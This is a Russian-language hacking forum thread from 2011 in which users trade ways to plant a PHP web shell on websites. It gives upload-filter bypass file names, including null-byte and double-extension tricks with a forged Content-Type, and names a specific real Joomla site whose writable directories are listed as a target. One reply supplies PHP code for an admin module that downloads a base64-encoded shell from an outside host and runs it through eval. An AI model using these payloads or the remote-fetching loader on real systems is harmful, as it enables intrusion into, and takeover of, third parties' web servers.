 |
|
26.03.2011, 18:37
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Столкнулся с проблемой в админке есть функция загрузки картинок в галерею, ресайза нет, но добавляется расширение jpeg, и проверяется mime на image, только в одном случае, когда льешь ex.php.jpeg добавляется ex.txt. В галереи отображается картинка как надо, а когда по прямому пути, то исходник картинки+шелла. Может кто сталкивался, как обойти.
p.s. инклуда нет
|
|
|
26.03.2011, 19:58
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Сообщение от Moriarty
По движку ориентируйся. Галерея - наверняка модуль.
Двиг самопис, блок по белому списку.
|
|
|
|
26.03.2011, 20:16
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами:
9846041
Репутация:
1177
|
|
Сообщение от Lijzer
Двиг самопис, блок по белому списку.
А если отправлять с белым разрешением (x3k.jpg), то с каким именем она зальеться на сервер? С таким же, или добавляется еще jpeg o_0 ?
Попробуй отправить x3k.jpeg.php подделав Content-Type на Image.
И вот такие названия пробуй:
x3k.php.blablajpg
x3k.php%00.jpeg
|
|
|
|
26.03.2011, 21:23
|
|
Новичок
Регистрация: 04.06.2010
Сообщений: 0
С нами:
8388263
Репутация:
0
|
|
Сообщение от Tigger
А если отправлять с белым разрешением (x3k.jpg), то с каким именем она зальеться на сервер? С таким же, или добавляется еще jpeg o_0 ?
Попробуй отправить x3k.jpeg.php подделав Content-Type на Image.
И вот такие названия пробуй:
x3k.php.blablajpg
x3k.php%00.jpeg
Нуль байт - уж слишком старомодно
скорее всего защита от такого есть
даже в самописном движке
|
|
|
|
26.03.2011, 22:44
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Сообщение от Tigger
А если отправлять с белым разрешением (x3k.jpg), то с каким именем она зальеться на сервер? С таким же, или добавляется еще jpeg o_0 ?
Попробуй отправить x3k.jpeg.php подделав Content-Type на Image.
И вот такие названия пробуй:
x3k.php.blablajpg
x3k.php%00.jpeg
Четыре расширения в белом списке gif,jpg,jpeg,png. Льешь jpg>jpg на выходе.
Подделывал Content-Type на image/jpeg выкинуло ошибку.
Нижнии два варианта при первоначальном попадании в админку, не помогли
|
|
|
|
29.03.2011, 00:30
|
|
Участник форума
Регистрация: 02.09.2009
Сообщений: 286
С нами:
8784803
Репутация:
257
|
|
Жумла
Права доступа на каталоги
Сообщение от None
administrator/backups/ Недоступен для записи
administrator/components/ Недоступен для записи
administrator/modules/ Недоступен для записи
administrator/templates/ Недоступен для записи
components/ Недоступен для записи
images/ Недоступен для записи
images/banners/ Недоступен для записи
images/stories/ Недоступен для записи
language/ Недоступен для записи
mambots/ Недоступен для записи
mambots/content/ Недоступен для записи
mambots/editors/ Недоступен для записи
mambots/editors-xtd/ Недоступен для записи
mambots/search/ Недоступен для записи
mambots/system/ Недоступен для записи
media/ Недоступен для записи
modules/ Недоступен для записи
templates/ Недоступен для записи
Каталог кэша /var/www/forcekir/data/www/kadetstvo.info/cache/ Недоступен для записи
Каталог сессий /var/www/forcekir/data/mod-tmp/
Доступен для записи
Можно как-нить шелл залить? >_ |
|
|
|
29.03.2011, 00:46
|
|
Участник форума
Регистрация: 09.12.2010
Сообщений: 101
С нами:
8118326
Репутация:
-5
|
|
да, ставиь в пхп модуль (через админку)
Код:
if($_SERVER['REMOTE_ADDR']="TVOI_IP_VNESHKA")
{
echo(eval(base64_decode(file_get_contents("http://iahacker.ru/TVOI_BASE64_ENKODIROVANII_SHELL.txt"))));
die();
}
|
|
|
|
29.03.2011, 00:53
|
|
Новичок
Регистрация: 17.07.2010
Сообщений: 16
С нами:
8327126
Репутация:
0
|
|
что делать пробую залить шелл шелл.пшп.джпег но его в постледствие залива переименовывает на какой нить нв3-1.джпег и он не запускается! как обойти или мож я чето не так делаю??
|
|
|
|
29.03.2011, 01:05
|
|
Участник форума
Регистрация: 02.09.2009
Сообщений: 286
С нами:
8784803
Репутация:
257
|
|
Сообщение от rootmd
да, ставиь в пхп модуль (через админку)
Код:
if($_SERVER['REMOTE_ADDR']="TVOI_IP_VNESHKA")
{
echo(eval(base64_decode(file_get_contents("http://iahacker.ru/TVOI_BASE64_ENKODIROVANII_SHELL.txt"))));
die();
}
куда\что именно? модули залить нельзя
|
|
|
|
29.03.2011, 10:08
|
|
Познающий
Регистрация: 10.04.2010
Сообщений: 49
С нами:
8467184
Репутация:
1
|
|
[QUOTE="None"]
Жумла
Права доступа на каталоги
Цитата:
administrator/backups/ Недоступен для записи
administrator/components/ Недоступен для записи
administrator/modules/ Недоступен для записи
administrator/templates/ Недоступен для записи
components/ Недоступен для записи
images/ Недоступен для записи
images/banners/ Недоступен для записи
images/stories/ Недоступен для записи
language/ Недоступен для записи
mambots/ Недоступен для записи
mambots/content/ Недоступен для записи
mambots/editors/ Недоступен для записи
mambots/editors-xtd/ Недоступен для записи
mambots/search/ Недоступен для записи
mambots/system/ Недоступен для записи
media/ Недоступен для записи
modules/ Недоступен для записи
templates/ Недоступен для записи
Каталог кэша /var/www/forcekir/data/www/kadetstvo.info/cache/ Недоступен для записи
Каталог сессий /var/www/forcekir/data/mod-tmp/ Доступен для записи
Можно как-нить шелл залить? >__
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
